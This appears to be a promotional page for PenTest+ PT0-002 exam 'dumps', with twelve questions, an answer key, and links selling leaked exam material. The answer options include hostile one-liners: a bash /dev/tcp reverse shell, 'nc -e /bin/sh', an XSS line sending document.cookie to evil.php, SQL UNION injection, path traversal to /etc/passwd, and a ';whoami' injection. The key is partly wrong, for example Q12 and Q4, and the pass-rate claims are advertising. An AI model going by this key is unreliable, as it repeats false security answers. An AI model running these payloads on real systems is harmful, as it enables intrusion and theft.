The new PenTest+ (PT0-002) exam will launch on October 28, 2021!
What is CompTIA PenTest+?
For Cybersecurity Professionals Responsible for Penetration Testing and Vulnerability Management
Do you know PT1-002? This is an over-examination item for PT0-002, a new word for 2021, and has now been phased out. From October 28th, 2021, PT0-002 is the PenTest+ mainstream exam item.
The first update of CompTIA PenTest+ pt0-002 in 2022 starts here. I will share some of the newly updated CompTIA PenTest+ pt0-002 free exam questions to help you study easily, and you can take online practice tests.
All free exam questions are from Lead4Pass pt0-002 dumps. pt0-002 dumps are available in both PDF and VCE modes: https://www.leads4pass.com/pt0-002.html (161 Q&A).
Also, share CompTIA PenTest+ pt0-002 dumps PDF online download: https://drive.google.com/file/d/1vwL5SOqsobCDA1z9PJMQGNS_BZoxfmk8/
CompTIA PenTest+ PT0-002 Free Dumps Online Exam Test
Please record your answers and verify them at the end of the article
QUESTION 1
A penetration tester ran the following command on a staging server:
python –m SimpleHTTPServer 9891
Which of the following commands could be used to download a file named exploit to a target machine for execution?
A. nc 10.10.51.50 9891
B. powershell –exec bypass –f \\10.10.51.50\9891
C. bash –i >and /dev/tcp/10.10.51.50/9891 0and1>/exploit
D. wget 10.10.51.50:9891/exploit
Reference: https://www.redhat.com/sysadmin/simple-http-server
QUESTION 2
During a penetration-testing engagement, a consultant performs reconnaissance of a client to identify potential targets for a phishing campaign. Which of the following would allow the consultant to retrieve email addresses for technical and billing contacts quickly, without triggering any of the client\\’s cybersecurity tools? (Choose two.)
A. Scraping social media sites
B. Using the WHOIS lookup tool
C. Crawling the client\\’s website
D. Phishing company employees
E. Utilizing DNS lookup tools
F. Conducting wardriving near the client facility
QUESTION 3
A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot.
Which of the following techniques would BEST support this objective?
A. Create a one-shot systemd service to establish a reverse shell.
B. Obtain /etc/shadow and brute force the root password.
C. Run the nc -e /bin/sh command.
D. Move laterally to create a user account on LDAP
QUESTION 4
A tester who is performing a penetration test on a website receives the following output:
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/search.php on line 62
Which of the following commands can be used to further attack the website?
A. var adr= `../evil.php?test=\\’ + escape(document.cookie);
B. ../../../../../../../../../../etc/passwd
C. /var/www/html/index.php;whoami
D. 1 UNION SELECT 1, DATABASE(),3-
QUESTION 5
A security engineer identified a new server on the network and wants to scan the host to determine if it is running an
approved version of Linux and a patched version of Apache.
Which of the following commands will accomplish this task?
A. nmap –f –sV –p80 192.168.1.20
B. nmap –sS –sL –p80 192.168.1.20
C. nmap –A –T4 –p80 192.168.1.20
D. nmap –O –v –p80 192.168.1.20
Reference: https://nmap.org/book/man-version-detection.html
QUESTION 6
Which of the following expressions in Python increase a variable val by one (Choose two.)
A. val++
B. +val
C. val=(val+1)
D. ++val
E. val=val++
F. val+=1
Reference: https://stackoverflow.com/questions/1485841/behaviour-of-increment-and-decrement-operators-in-python
QUESTION 7
Penetration-testing activities have concluded, and the initial findings have been reviewed with the client.
Which of the following best describes the NEXT step in the engagement?
A. Acceptance by the client and sign-off on the final report
B. Scheduling of follow-up actions and retesting
C. Attestation of findings and delivery of the report
D. Review of the lessons learned during the engagement
QUESTION 8
A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals.
Which of the following should the tester do NEXT?
A. Reach out to the primary point of contact
B. Try to take down the attackers
C. Call law enforcement officials immediately
D. Collect the proper evidence and add to the final report
QUESTION 9
Which of the following should a penetration tester attack to gain control of the state in the HTTP protocol after the user is logged in?
A. HTTPS communication
B. Public and private keys
C. Password encryption
D. Sessions and cookies
QUESTION 10
A penetration tester is reviewing the following SOW prior to engaging with a client:
“Network diagrams, logical and physical asset inventory, and employees\\’ names are to be treated as client
confidential. Upon completion of the engagement, the penetration tester will submit findings to the client\\’s Chief
Information Security Officer (CISO) via encrypted protocols and subsequently dispose of all findings by erasing them in a secure manner.” Based on the information in the SOW, which of the following behaviors would be considered unethical? (Choose two.)
A. Utilizing proprietary penetration-testing tools that are not available to the public or to the client for auditing and
inspection
B. Utilizing public-key cryptography to ensure findings are delivered to the CISO upon completion of the engagement
C. Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client\\’s
senior leadership team
D. Seeking help with the engagement in underground hacker forums by sharing the client\\’s public IP address
E. Using a software-based erase tool to wipe the client\\’s findings from the penetration tester\\’s laptop
F. Retaining the SOW within the penetration tester\\’s company for future use so the sales team can plan future
engagements
QUESTION 11
A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging.
Which of the following techniques would BEST accomplish this goal?
A. RFID cloning
B. RFID tagging
C. Meta tagging
D. Tag nesting
QUESTION 12
A penetration tester runs the following command on a system:
find / -user root –perm -4000 –print 2>/dev/null
Which of the following is the tester trying to accomplish?
A. Set the SGID on all files in the / directory
B. Find the /root directory on the system
C. Find files with the SUID bit set
D. Find files that were created during exploitation and move them to /dev/null
Reference: https://sagar5258.blogspot.com/2015/03/find-command-in-linux-examples.html
Verify answer
| Q1 | Q2 | Q3 | Q4 | Q5 | Q6 | Q7 | Q8 | Q9 | Q10 | Q11 | Q12 |
| D | BC | C | C | C | DF | A | A | D | CE | C | D |
Latest complete CompTIA PenTest+ pt0-002 exam questions and answers at Lead4Pass pt0-002 dumps:https://www.leads4pass.com/pt0-002.html (161 Q&A).
P.S. Download the CompTIA PenTest+ PT0-002 dumps PDF I prepared for you from google cloud: https://drive.google.com/file/d/1vwL5SOqsobCDA1z9PJMQGNS_BZoxfmk8/
Maybe you want to ask:
Can Lead4Pass help me pass the exam successfully?
Lead4Pass has a 99%+ exam pass rate, this is real data.
Is Lead4Pass PT0-002 dumps latest valid?
Lead4Pass updates all IT certification exam questions throughout the year. Guaranteed immediate availability.
Is the Lead4Pass buying policy reliable?
In 2022, Lead4Pass has 8 years of exam experience, so don’t worry!
Is there a discount on CompTIA PT0-002?
Yes! You can google search, or check the discount code channel directly
For more questions, you can contact Lead4Pass customer service or send an email, and we will guarantee a reply within 24 hours.
